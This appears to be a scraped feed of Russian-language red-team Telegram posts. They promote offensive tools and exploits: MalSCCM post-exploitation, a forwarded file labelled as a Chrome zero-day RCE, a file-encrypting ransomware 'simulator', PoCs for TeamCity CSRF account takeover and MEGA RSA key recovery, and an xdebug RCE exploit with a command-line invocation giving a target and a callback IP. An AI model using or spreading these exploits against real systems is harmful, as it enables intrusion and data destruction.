Дотянуться в виндовой сетке до сервера SCCM грозит тем, что у Вас будет прекрасный день, сопряженный со слезами радости. Это почти так же здорово как и сервер ansible в *nix средах))
Но, обо всем по порядку.
На сцене MalSCCM.
Описание
Install and Use
#PostExploitation #redteam
Но, обо всем по порядку.
На сцене MalSCCM.
Описание
Install and Use
#PostExploitation #redteam
👍4
Forwarded from Proxy Bar (private)
Chrome0day-RCE-SBX.zip
827.6 KB
for Windows and Android !!!!😳
🔥16👍3😱2
Сначала было смешно, а потом как не смешно !
Есть на гитхабе некий RanSim (линк мы вам конечно же не дадим).
****
Это шляпа на PowerShell, которая моделирует (ога ога) поведение шифровальщика !
А моделирует оно путем рекурсивного шифрования (aes 256) всего чего увидит.
****
Этот же скрипт можно использовать для ДЕшифровки, ЕСЛИ ЭТО НЕОБХОДИМО - говорят нам разработчики))))
Подмена понятий в действии.
#ransomware
Есть на гитхабе некий RanSim (линк мы вам конечно же не дадим).
****
Это шляпа на PowerShell, которая моделирует (ога ога) поведение шифровальщика !
А моделирует оно путем рекурсивного шифрования (aes 256) всего чего увидит.
****
Этот же скрипт можно использовать для ДЕшифровки, ЕСЛИ ЭТО НЕОБХОДИМО - говорят нам разработчики))))
Подмена понятий в действии.
#ransomware
😱18👍3🔥1
CVE-2022-24342
JetBrains TeamCity - account takeover via CSRF in GitHub authentication (PoC exploit)
Смотреть немое кино тут
#cve #poc
JetBrains TeamCity - account takeover via CSRF in GitHub authentication (PoC exploit)
Смотреть немое кино тут
#cve #poc
Про шифрование на mega.nz наверно все уже слышали да ?
Уже и mitm RSA key recovery POC гуляет
Вот на почитать - как оно устроенно:
1. Malleable Encryption Goes Awry
2. RSA Key Recovery Attack
3. MEGA attack explainer
Вот на посмотреть
1. RSA key attack
#mega #rsa #poc
Уже и mitm RSA key recovery POC гуляет
Вот на почитать - как оно устроенно:
1. Malleable Encryption Goes Awry
2. RSA Key Recovery Attack
3. MEGA attack explainer
Вот на посмотреть
1. RSA key attack
#mega #rsa #poc
😱9👍4
xdebug.py
4.2 KB
Рубрика: "Нам прислали"
======================
An automated exploit to the xdebug 2.5.5 RCE vulnerability
======================
An automated exploit to the xdebug 2.5.5 RCE vulnerability
python3 xdebug.py -u http://10.10.10.83/index.php -l 10.10.16.3👍5🔥1